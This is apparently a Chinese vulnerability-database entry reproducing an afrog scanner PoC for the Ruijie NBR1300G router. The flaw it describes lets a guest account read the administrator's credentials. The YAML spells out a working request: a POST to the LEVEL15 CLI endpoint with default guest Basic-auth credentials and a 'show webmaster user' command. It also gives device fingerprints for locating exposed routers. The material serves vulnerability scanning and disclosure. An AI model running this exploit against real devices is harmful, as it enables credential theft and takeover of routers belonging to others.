ruijie-nbr1300g-cli-password-leak: ruijie-nbr1300g-cli-password-leak

日期: 2025-09-01 | 影响软件: ruijie nbr1300g | POC: 已公开

漏洞描述

锐捷NBR 1300G路由器 越权CLI命令执行漏洞,guest账户可以越权获取管理员账号密码 title="锐捷网络 --NBR路由器--登录界面" app="Ruijie-NBR路由器"

PoC代码[已公开]

id: ruijie-nbr1300g-cli-password-leak

info:
    name: ruijie-nbr1300g-cli-password-leak
    author: abbin777
    severity: high
    verified: true
    description: |
        锐捷NBR 1300G路由器 越权CLI命令执行漏洞,guest账户可以越权获取管理员账号密码
        title="锐捷网络 --NBR路由器--登录界面"
        app="Ruijie-NBR路由器"
    reference:
        - http://wiki.peiqi.tech/wiki/iot/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7%20NBR%201300G%E8%B7%AF%E7%94%B1%E5%99%A8%20%E8%B6%8A%E6%9D%83CLI%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
        
rules:
    r0:
        request:
            method: POST
            path: /WEB_VMS/LEVEL15/
            headers:
                Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
            body: command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
        expression: response.status == 200 &&  "webmaster level ([0-9]) username".bmatches(response.body)
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/disclosure/ruijie-nbr1300g-cli-password-leak.yaml

相关漏洞推荐